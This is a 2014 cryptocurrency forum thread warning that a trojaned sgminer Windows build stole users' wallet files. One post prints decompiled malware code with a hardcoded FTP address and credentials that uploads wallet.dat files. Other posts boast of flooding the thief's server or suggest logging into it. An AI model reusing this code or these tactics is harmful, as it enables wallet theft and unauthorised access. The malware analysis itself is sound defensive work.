Author

Topic: ALERT! sgminerwindows.com Stealing Bitcoins! (Read 13599 times)

sr. member
Activity: 412
Merit: 250
November 20, 2014, 03:45:41 AM
#94
ok thanks I see that above. How to setup X11 I didn't see kernel for that?
legendary
Activity: 885
Merit: 1006
NiceHash.com
November 20, 2014, 03:27:24 AM
#93
where I can download clean of viruses miner which is compilled for x11 and x13?

Here you can download trustworthy windows/linux sgminer and cgminer binaries: https://www.nicehash.com/software/#sgminer
sr. member
Activity: 412
Merit: 250
November 20, 2014, 02:59:47 AM
#92
where I can download clean of viruses miner which is compilled for x11 and x13?
full member
Activity: 142
Merit: 100
September 12, 2014, 01:10:55 PM
#91
That's it. I am NOT gonna trust this shit until I hear differently about CLEAN and dependable files with FULL and EXPLICIT clearance. This is so bad.
legendary
Activity: 885
Merit: 1006
NiceHash.com
Here you can download trustworthy windows/linux sgminer and cgminer binaries: https://www.nicehash.com/software/
hero member
Activity: 546
Merit: 510
What type of file are you decompiling, IDA wont identify the entry point of several different files and only break them down to hex.
I'm trying to decompile the shirecoin-qt.exe (not sure if possible).
chnchapters said he saw the code, and that it steals the wallets like the miner.

Never ever use precompiled binaries of altcoins, always check the code on github first. Any closed source altcoins can not be trusted either.

To difficult for average user. I have no idea how to do that kinda shit, just instal and launch, that is the only way to go!  Cool
sr. member
Activity: 476
Merit: 250
What type of file are you decompiling, IDA wont identify the entry point of several different files and only break them down to hex.
I'm trying to decompile the shirecoin-qt.exe (not sure if possible).
chnchapters said he saw the code, and that it steals the wallets like the miner.

Never ever use precompiled binaries of altcoins, always check the code on github first. Any closed source altcoins can not be trusted either.
sr. member
Activity: 407
Merit: 250
I used HexRays/IDA
I can show you exactly how I did when I get off work,
the tainted SGminer programs, and Shire coin both use the same ftp server where the stolen wallets were being up loaded.
Sure, when you can.

I'm using idaq.exe (i guess that's the program you mention).
I selected the shirecoin-qt.exe and let it analyze it (with default options), but when I tried to go to pseudo code, it told me "decompilation failure"

If I choose binary --> processor type Microsoft - net.
Then it says it can't identify the entry point.
And I get to see hex crap. Can't view pseudo code mode.

Well, first time using this program, so maybe there's some trick.
Thanks.
@chnchapters: Don't forget, thanks.
sr. member
Activity: 407
Merit: 250
What type of file are you decompiling, IDA wont identify the entry point of several different files and only break them down to hex.
I'm trying to decompile the shirecoin-qt.exe (not sure if possible).
chnchapters said he saw the code, and that it steals the wallets like the miner.
sr. member
Activity: 336
Merit: 250
What type of file are you decompiling, IDA wont identify the entry point of several different files and only break them down to hex.
sr. member
Activity: 407
Merit: 250
I used HexRays/IDA
I can show you exactly how I did when I get off work,
the tainted SGminer programs, and Shire coin both use the same ftp server where the stolen wallets were being up loaded.
Sure, when you can.

I'm using idaq.exe (i guess that's the program you mention).
I selected the shirecoin-qt.exe and let it analyze it (with default options), but when I tried to go to pseudo code, it told me "decompilation failure"

If I choose binary --> processor type Microsoft - net.
Then it says it can't identify the entry point.
And I get to see hex crap. Can't view pseudo code mode.

Well, first time using this program, so maybe there's some trick.
Thanks.
member
Activity: 106
Merit: 10
I used HexRays/IDA
I can show you exactly how I did when I get off work,
the tainted SGminer programs, and Shire coin both use the same ftp server where the stolen wallets were being up loaded.
sr. member
Activity: 407
Merit: 250
He is also the creator of Shire Coin, which is a scam because it uses the same code to steal coins if you download the wallet.
How can I check that?
I downloaded that qt some time ago, so it probably stole my encrypted wallet.dat (haven't lost coins, but still want to know if I should consider the wallet compromised)
I tried decompiling it, but it says it isn't a .net program.
What did you use to view the code? Thanks.
hero member
Activity: 938
Merit: 1000
www.multipool.us
So is it confirmed that the tainted code was only in recent builds?  If so, how long ago did it happen?

According to LiteSaber, the tainted code was in the most recent binaries which were linked from another site (minersforwindows.com)
newbie
Activity: 15
Merit: 0
So is it confirmed that the tainted code was only in recent builds?  If so, how long ago did it happen?
hero member
Activity: 938
Merit: 1000
www.multipool.us
I have the domain now.  I will be downing the site until the new binaries are available with an explanation of what happened.
member
Activity: 83
Merit: 10
Just for future reference.

I've handed over control of the sgminerwindows.com domain / website to flound1129

Hopefully he has more time to keep it all up to date than I did.
full member
Activity: 168
Merit: 100
From my simple investigation if would seem its a non persistent threat, as seen in the code back in the thread.

It basically looks for common wallet files and uploads them to a FTP server each time its run.

So encrypt your bloody wallets always.

newbie
Activity: 16
Merit: 0
their all set manicious malyware update virus.
you should check your device.
sr. member
Activity: 412
Merit: 250
If you read on site he is not compilled latest version of sgminer but he downloaded it from here
http://minersforwindows.com/

Actually this site is with malware sgminer
member
Activity: 98
Merit: 10
Does anybody know if that sgminer install some malware on computer and will still steall money from wallets after you remove it from computer or that does just sgminer itself so I don't need to reinstall windows but only remove sgminer?
if it was me I would do a clean install of windows as these things trend to write to other directorys besides the sgminer or wallet one etc.    think of it as normal malware it can write it file in a number of different directory's   and it a pain in the ass to fully get rid of etc
sr. member
Activity: 412
Merit: 250
Does anybody know if that sgminer install some malware on computer and will still steall money from wallets after you remove it from computer or that does just sgminer itself so I don't need to reinstall windows but only remove sgminer?
hero member
Activity: 938
Merit: 1000
www.multipool.us
Sorry guys, just saw messages someone sent me on IRC.

I've gone ahead and removed the download links from sgminerwindows right away.

Previously I compiled all versions myself and these were 100% clean i guarantee. But the last update was done away from my computer (on a family vacation) using pre-compiled binaries from minersforwindows.com because I was getting heaps of messages from people to update with the latest beta version.

Stupid move on my part it seems. That'll teach me for being lazy and not just installing what i needed to compile onto my laptop.

In the spirit of keeping the site going (in the right hands) If there is a known trustworthy person here that would like to take over the website from this point on, I will happily give you the website's files and push the domain to you free of charge (you will need a namesilo.com account).

It's already ranking #1 in google for many sgminer terms so I would rather not see the site go to waste. But I just do not have the time to keep it updated.

Also, if you don't believe me. Go and check out minersforwindows.com and scan their versions. They do many more versions that i never added to my site thankfully. They also do other mining software.


Sent you a PM, I'm willing to take this over.
member
Activity: 85
Merit: 10
Damn scammers, they are everywhere I go  Angry

Yeah i fucked him up a little. Must have uploaded at least 10GB of binary 0's and 1's.

He got smart:

Disconnected from server
Connection failed.
No connections allowed from your IP

Hahahaha.
member
Activity: 113
Merit: 10
Hey guys! sorry to hear what happened! this is ridiculous! It happened to me with another file I tried to download. The file file was the zipcoin-qt and it was designed to steal wallet.dat the exact way that this is...
Check out the thread https://bitcointalk.org/index.php?topic=721306.260 it took a few of us who were scammed a while to convince everyone but I think they believe it now
hero member
Activity: 546
Merit: 510
Damn scammers, they are everywhere I go  Angry
member
Activity: 83
Merit: 10
Sorry guys, just saw messages someone sent me on IRC.

I've gone ahead and removed the download links from sgminerwindows right away.

Previously I compiled all versions myself and these were 100% clean i guarantee. But the last update was done away from my computer (on a family vacation) using pre-compiled binaries from minersforwindows.com because I was getting heaps of messages from people to update with the latest beta version.

Stupid move on my part it seems. That'll teach me for being lazy and not just installing what i needed to compile onto my laptop.

In the spirit of keeping the site going (in the right hands) If there is a known trustworthy person here that would like to take over the website from this point on, I will happily give you the website's files and push the domain to you free of charge (you will need a namesilo.com account).

It's already ranking #1 in google for many sgminer terms so I would rather not see the site go to waste. But I just do not have the time to keep it updated.

Also, if you don't believe me. Go and check out minersforwindows.com and scan their versions. They do many more versions that i never added to my site thankfully. They also do other mining software.
member
Activity: 85
Merit: 10
It sucks for anyone who got scammed with this. I will be uploading lots of dummy 100mb files to that server just for lolz.
sr. member
Activity: 336
Merit: 250
sr. member
Activity: 336
Merit: 250
Nice, Im in the chatroom posting this asking how come both vertsquads guide and coinhuntr's guide link directly to it but the chat rooms are dead
Hes in both chatrooms, feel free to send him messages,  I am
hero member
Activity: 938
Merit: 1000
www.multipool.us
The guy who built these binaries is: http://www.reddit.com/user/LiteSaber

According to his post history he also runs VertSquad.com and CoinHuntr.com.

It's also possible the site could have been compromised by someone else who uploaded the trojaned binaries.
hero member
Activity: 938
Merit: 1000
www.multipool.us
I've filed a report on Google's safe browsing site and I suggest more people do the same.

https://www.google.com/safebrowsing/report_badware/

The site is still the #1 hit on google for "sgminer windows".
hero member
Activity: 938
Merit: 1000
www.multipool.us
Multipool has removed the link to this site as well.  Pretty sad that something that was originally legit is now being used to scam people.
member
Activity: 72
Merit: 10
The scammer here has other versions of SGminer that contain the hidden script, I can point the code out there as well.
He is also the creator of Shire Coin, which is a scam because it uses the same code to steal coins if you
download the wallet.

good to know that. im scared since last incident that why i dont mine in your pool, well i will try to get some blackcoin for hoarding.
member
Activity: 106
Merit: 10
The scammer here has other versions of SGminer that contain the hidden script, I can point the code out there as well.
He is also the creator of Shire Coin, which is a scam because it uses the same code to steal coins if you
download the wallet.
member
Activity: 106
Merit: 10
Confirmed

We're gathering all the necessary information and evidence right now.
Suspect that the person compiling binaries for SGMiner (www.sgminerwindows.com) was trying to pull a fast one.

Interested to know what you gathered.

And BTW, what program are you using to reserve engineer the miners and get such a clean code?

The program I used is called IDA / hexrays
check it out,

I gathered a lot of stuff actually, I saved each step we did along the way..
member
Activity: 72
Merit: 10
the problem is solved guys titled changed, the next time i will take more carefull, so sorry for all involved in this fact.
legendary
Activity: 2324
Merit: 1039
Since this is NOT blackcoinpools fault, can we get OP to CHANGE the title of this thread please? I'm more than happy to reimburse if it wasnt done already.

i send you some messages without responde, i will change the title when i get my coins backs.
after all i was infected through blackcoinpool i hope you guys take the right decision reimburse my coins.



no offence but your line above looks like extortion.
you should change title and wait for their decision.  I don't think they are responsible for mess done on your side.

If it's down to money in don't trust anyone. beside they said you wasn't mining with them.

always encrypt wallet or use paper one as cold storage.
legendary
Activity: 1680
Merit: 1001
CEO Bitpanda.com
Are unencrypted wallets really that common? I thought it was common practice to encrypt everything.
legendary
Activity: 2198
Merit: 1014
Franko is Freedom
That is a really nice decomplier. Nice find, I warned the ADN thread.
sr. member
Activity: 336
Merit: 250
Looks like a nice decompiler, I'll have to check it out.  I always use IDA though I mostly decompile android software.
full member
Activity: 168
Merit: 100
The app was written using .net so I used telerik justdecompile.

Blooming great it is and its free.

http://www.telerik.com/products/decompiler.aspx

Also

http://www.telerik.com/fiddler

for web app spying and spoofying.
sr. member
Activity: 407
Merit: 250
Confirmed

We're gathering all the necessary information and evidence right now.
Suspect that the person compiling binaries for SGMiner (www.sgminerwindows.com) was trying to pull a fast one.

Interested to know what you gathered.

And BTW, what program are you using to reserve engineer the miners and get such a clean code?
legendary
Activity: 2688
Merit: 1192
Since this is NOT blackcoinpools fault, can we get OP to CHANGE the title of this thread please? I'm more than happy to reimburse if it wasnt done already.

i send you some messages without responde, i will change the title when i get my coins backs.
after all i was infected through blackcoinpool i hope you guys take the right decision reimburse my coins.



Google can send you to websites with virus links, is that Google's fault? No. They may recommend the service, the service may even have worked perfectly legit until a week ago, but you should still have done more research before acting so blindly. Anyone who has been using bitcoins longer than a week knows not to download ANYTHING which could take your wallets.
full member
Activity: 168
Merit: 100
Sammir, always apply a password to encrypt your hot wallets.
member
Activity: 72
Merit: 10
Since this is NOT blackcoinpools fault, can we get OP to CHANGE the title of this thread please? I'm more than happy to reimburse if it wasnt done already.

i send you some messages without responde, i will change the title when i get my coins backs.
after all i was infected through blackcoinpool i hope you guys take the right decision reimburse my coins.

member
Activity: 72
Merit: 10
must be hard to only being able to download binaries (*.EXE) and having to trust them Wink

why do you cry about stolen/lost coins by viruses/fakes if you do this and if you use winblows in combination? after all its your fault.

maybe because i just trust in localbitcoins? and blackcoinpool? who is redirect to a virus?

btw still i dont recive nothing guys
full member
Activity: 168
Merit: 100
K1773R how long did it take for you to become a prize cunt?
legendary
Activity: 1792
Merit: 1008
/dev/null
must be hard to only being able to download binaries (*.EXE) and having to trust them Wink

why do you cry about stolen/lost coins by viruses/fakes if you do this and if you use winblows in combination? after all its your fault.
newbie
Activity: 16
Merit: 0
change all your password . investment . bank . data . account . just  worry someone in your pc and trying to set keylogg hidden with fud . full undetectable virus .
sr. member
Activity: 407
Merit: 250
thanks i really appreciate your gesture of goodwill
Create a new wallet.dat, encrypt it and transfer all your funds there, so this doesn't happen again.
member
Activity: 72
Merit: 10
thanks i really appreciate your gesture of goodwill
member
Activity: 72
Merit: 10
Since this is NOT blackcoinpools fault, can we get OP to CHANGE the title of this thread please? I'm more than happy to reimburse if it wasnt done already.

would be great get a refund really need those coins, i think its fine to change the title so people not confuse with the pool.

sr. member
Activity: 336
Merit: 250
I agree the title should be changed.  I haven't had time to review the coding source code but I definitely wouldn't trust it for the time being.  It needs to be compiled and decompiled, updated and decompiled again. 
legendary
Activity: 2412
Merit: 1044
Since this is NOT blackcoinpools fault, can we get OP to CHANGE the title of this thread please? I'm more than happy to reimburse if it wasnt done already.
member
Activity: 72
Merit: 10
thanks fucking god, now all stupid guys think i was a fucking joke, can send me some coin back, thanks bossis for your job. Smiley i think too many people are infected with this be carefull guys.
sr. member
Activity: 336
Merit: 250
The binaries seem okay, I doubt the host of that website owns that github.

edit... best to look through the binaries a lot more before commenting one way or the other.

edit...  that's a fork from the original sgminer-dev/sgminer so its definitely possible
member
Activity: 74
Merit: 10
Didn't look into the ip, thanks.  Didn't look into his block chain transactions though somebody should.

Confirmed

We're gathering all the necessary information and evidence right now.
Suspect that the person compiling binaries for SGMiner (www.sgminerwindows.com) was trying to pull a fast one.

sr. member
Activity: 336
Merit: 250
Didn't look into the ip, thanks.  Didn't look into his block chain transactions though somebody should.
member
Activity: 105
Merit: 10
212.48.76.120 is hosted by http://www.webfusion.co.uk/

Code:
whv212-48-76-120.whv.webfusion.com

Edit:

By the way, look at this
https://bitcointalksearch.org/topic/ann-scn-shirecoin-mine-for-tolkien-659306



/snip .....

Quote
addnode=212.48.76.120

sr. member
Activity: 336
Merit: 250
Its not a admin account you cant view folders or files.  Using the mozzilla ftp its quite possibly his home ftp server though.
full member
Activity: 139
Merit: 103
Never use a pool that requires you to use there own software, or software they advise to use. Keep with what is known, if there pool does not work with the known trusted mining software, do not use that pool.

Someone must have fixed up those links on blackcoinpool.com. I know for a fact that those were working correctly about 7 weeks ago when I downloaded the miner and it pointed to the correct site.

Edit:
Nvm, should have read on to page two. If this is all true than god knows how many people are affected by this. I do however still have a version of sgminer on my system and I highly doubt this has ever sent anything out to a 3rd party such as an ftp.

Edit 2:
Quote
ldstr    "http://ftp://212.48.76.120/"
    ldstr    "medusaminer"
    ldstr    "barkleys"

Wouldn't this mean any of us could log-on to that ftp right now  and snatch any dat files that might be there?
sr. member
Activity: 336
Merit: 250
Its not even the miner, has no mining code in it.  Just uses some basic ftp commands and sends the wallet.dat files to the above listed ftp.
member
Activity: 105
Merit: 10
  Not taking from your site, FROM YOUR GETTING STARTING WINDOWS MINER LINK!!! 

It is hard for the pool operator monitor 3rd party link.
They might be virus free when being check by the pool operator, and get changed the next moment
newbie
Activity: 18
Merit: 0
If that is true, wouldn't that be the miners fault, rather than Blackcoin?
sr. member
Activity: 336
Merit: 250
Sorry I cant screenshot without the 2nd monitor window half.  Its in the getting started windows miner link, sgminerwindows.com the 4.4.2 miner download link.  Should be able to click the image and click the magnifying glass in photobucket to blow it up.  The file in the zip titles sgminer.exe and is 383kb
sr. member
Activity: 336
Merit: 250
Please due, I am NOT OP!  If you run the pool you should take the compliant seriously,  here  is another another screenshot of the file taking apart.  Not taking from your site, FROM YOUR GETTING STARTING WINDOWS MINER LINK!!! 
member
Activity: 106
Merit: 10
Oh you meant the link to download the SGminer...
I thought you meant the link to Sgminer's website from our pool...

The picture is still not expandable and unreadable, Im going to investigate as well...

This does not change the fact that it is not blackcoinpool.com or anything to do with Black Coin, and if true, something that we thank you for pointing out.
member
Activity: 74
Merit: 10
member
Activity: 106
Merit: 10
You are now backtracking and changing what you said...

Origanally you stated that you downloaded SGminer4.x and took it a part to find the "code that steals BTC"

Now we post github of SGminer and you say it is in the link? What?

Are you just trying to trick people who do not know anything about code or mining into FUD?

sr. member
Activity: 336
Merit: 250
Fine I'll do all the work for you guys, the linked code in github is obviously not the code the bad link!   Here are some code samples from the file :
 call     string [mscorlib]System.String::Concat(string, string)
    call     class [mscorlib]System.IO.DirectoryInfo [mscorlib]System.IO.Directory::CreateDirectory(string)
    pop
    ldstr    "http://ftp://212.48.76.120/"
    ldstr    "medusaminer"
    ldstr    "barkleys"
    newobj   instance void ftp::.ctor(string hostIP, string userName, string password)
    stloc.1
    newobj   instance void [mscorlib]System.Random::.ctor()
    stloc.2
    ldloc.2
    ldc.i4.0

    nop
    ldloc.0
    ldstr    "\\bitcoin"
    call     string [mscorlib]System.String::Concat(string, string)
    call     bool [mscorlib]System.IO.Directory::Exists(string)
    ldc.i4.0
    ceq
  ldstr    "\\bitcoin\\wallet.dat"
    call     string [mscorlib]System.String::Concat(string, string)
    callvirt instance void ftp::upload(string remoteFile, string localFile)
    nop
    nop

loc_B8C:                                // CODE XREF: Upload+A6

    ldstr    "\\litecoin\\wallet.dat"
    call     string [mscorlib]System.String::Concat(string, string)
    call     bool [mscorlib]System.IO.File::Exists(string)
    ldc.i4.0
    ceq
    stloc.s  8
    ldloc.s  8
    brtrue.s loc_C14
    nop

screenshot because I know you don't believe me :



member
Activity: 74
Merit: 10
I run www.blackcoinpool.com

https://github.com/veox/sgminer <<< if you took it apart, you would have no problem pointing it out in the code.

sgminer is not required to use Black Coin Pool, it's just a common mining software that people use, so we posted up a tutorial.
If some one posts some viable proof, other than "I did it, believe me" I will gladly remove any mention of SGminer from the pool.
But out of the thousands of people that have used the pool, and the thousands upon thousands of people who use SGMiner, only you seem to be "getting hacked."

No proof of anything other than showing a transaction from a wallet, and then posting your address asking for donations while deleting posts from this forum.
member
Activity: 106
Merit: 10
Again here is a link to virus scans:
https://www.virustotal.com/en/file/f993b578fa9e715f1fee5063b31b2c16686e26774771f98cf2850600bfc29ef5/analysis/

I also have gone out of my way to contact this person and email them and get a hold of them
They just quit IRC or won't respond

And even if, hypothetically, Sgminer had a virus, that is not as the title claims Blackcoinpool.com
newbie
Activity: 28
Merit: 0
yeah i know bro i was so stupid on me i was not paying attention....and im very sad about it if someone want to help me a little this is my new btc adress 1HwERQLFH4wxHiikQkbP899YEhhB7tFHN  Embarrassed

Its definitely a virus and steals around 10 wallet files ....  I took apart the windows 4.2.2 wallet.

I would highly doubt that.  

What virus do you have.  If it was an infection it should be detectable.  How did it steal 10 wallets.. sounds like a keystroke cap. virus..

No a lot of proof here to me.   Roll Eyes

I like clambakes.. but never have went to them or can eat clams.. is that true.. ?
member
Activity: 106
Merit: 10

Has never mined with Black Coin Pool...
sr. member
Activity: 336
Merit: 250
Hes not a troll, as I said I took reverse engineered the file and it is definitely a wallet stealer.  Blackcoinpool.com links directly to the site for a windows miner in getting started.  If your sure he is a troll download the windows miner and run it, then lose all of your wallets. 
member
Activity: 106
Merit: 10
The title to this thread is misleading and wrong.

He is claiming SGminer stole his BTC, not the pool

He has never mined on the pool before.

SGminer is a seperate website than BlackCoinPool
sr. member
Activity: 299
Merit: 250
Biggest altcoin multipool in existence installs a virus to steal users bitcoin.  One person complains while asking for donations to get back on his feet.  Seems legit.
member
Activity: 106
Merit: 10
member
Activity: 106
Merit: 10
All you showed was a BTC transaction...

The miner you downloaded had nothing to do with Black Coin.

I run the pool for Black Coin and this person has never mined with us, he posted in IRC and i tried to help him and he quit.
I took it upon myself and searched for his username to find an email and emailed him trying to see what the issue
was.
Within thatt 5 min he had a post on this thread.

This is FUD and a troll.

He had the same exact thread with multiple talking and he deleted it cuz he was discredited
member
Activity: 106
Merit: 10
There were like 10 posts deleted in this thread
this is a troll...
sr. member
Activity: 476
Merit: 250
Keep away from pools that use it, most likely involved in other nasty's like block skimming if they are giving out a wallet stealer.
full member
Activity: 143
Merit: 100
multipool.us/help.php

Multipool.us advises miners to go to sgminerwindows.com as well. Is Multipool.us scamming and stealing people's bitcoins?
may be its paid link or some ad arrangement
sr. member
Activity: 336
Merit: 250
Its definitely a virus and steals around 10 wallet files ....  I took apart the windows 4.2.2 wallet.
member
Activity: 72
Merit: 10
yes bro, i was the only stupid shit i've download on my computer, NEVER i had any situation like this before.
member
Activity: 105
Merit: 10
Never use a pool that requires you to use there own software, or software they advise to use. Keep with what is known, if there pool does not work with the known trusted mining software, do not use that pool.

always compile from source is the best solution.

http://www.sgminerwindows.com/  is being linked by many people. Didn't know that that is a scam.

if it is a virus, lots of people would be affected
http://www.reddit.com/r/dogecoin/comments/20h68h/released_windows_builds_of_the_new_sgminer_41153/
http://www.reddit.com/r/litecoinmining/comments/20fsdz/released_windows_builds_of_the_new_sgminer_41153/
https://bitcointalksearch.org/topic/m.6226521

I tried doing a quick search in bitcointalk and realize lots of pool is linking to that site
newbie
Activity: 4
Merit: 0
https://www.multipool.us/help.php

Multipool.us advises miners to go to www.sgminerwindows.com as well. Is Multipool.us scamming and stealing people's bitcoins?
member
Activity: 72
Merit: 10
yeah i know bro i was so stupid on me i was not paying attention....and im very sad about it if someone want to help me a little this is my new btc adress 1HwERQLFH4wxHiikQkbP899YEhhB7tFHN  Embarrassed
sr. member
Activity: 476
Merit: 250
Never use a pool that requires you to use there own software, or software they advise to use. Keep with what is known, if there pool does not work with the known trusted mining software, do not use that pool.
sr. member
Activity: 336
Merit: 250
Actually that software steals your bitcoin, litecoin, dogecoin, auroracoin +++ many more and uploads the wallet files via ftp.  So they have all your wallets.... I reverse engineered the file and it was formerly known as the mudusaminer which ripped people off.  The wallets are sent to http://ftp://212.48.76.120 with the login credentials "medusaminer" password: "barkleys".
member
Activity: 72
Merit: 10
no problem just take care with this site http://www.sgminerwindows.com/
legendary
Activity: 1680
Merit: 1001
CEO Bitpanda.com
That is bitter.

Thank you for warning us and fuck those asshats Sad
member
Activity: 67
Merit: 10
sorry to hear that man. make sure you reformat your pc.
member
Activity: 72
Merit: 10
hi guys, my history start yesterday when i was trying to find some good miner for blackcoins so I go to the best known pool of this currency blackcoinpool.com the website looks profesional but see where are the trick here.



when you download that miner nothing happens, an hour later i go to my btc wallet and there is my surprise!

i think these miner are something in autoit that sends all my btc to a particular address, the rarity of this none of my antivirus detect nothing.
here the transation https://blockchain.info/address/1CY4DWVwBjiVxicUH8w2UHgcHvPEBqokZ2?sort=0
and here are my btc right now. https://blockchain.info/es/address/14DQtdeQYcvUALxVYacnewBAMpHko4i2GF
so guys take care with this site.
 Cry

after an arduous investigation, we discovered that blackcoinpool.com had no interference in fact, rather sgminerwindows.com, so we duly notified users to be very careful with that website.
Jump to: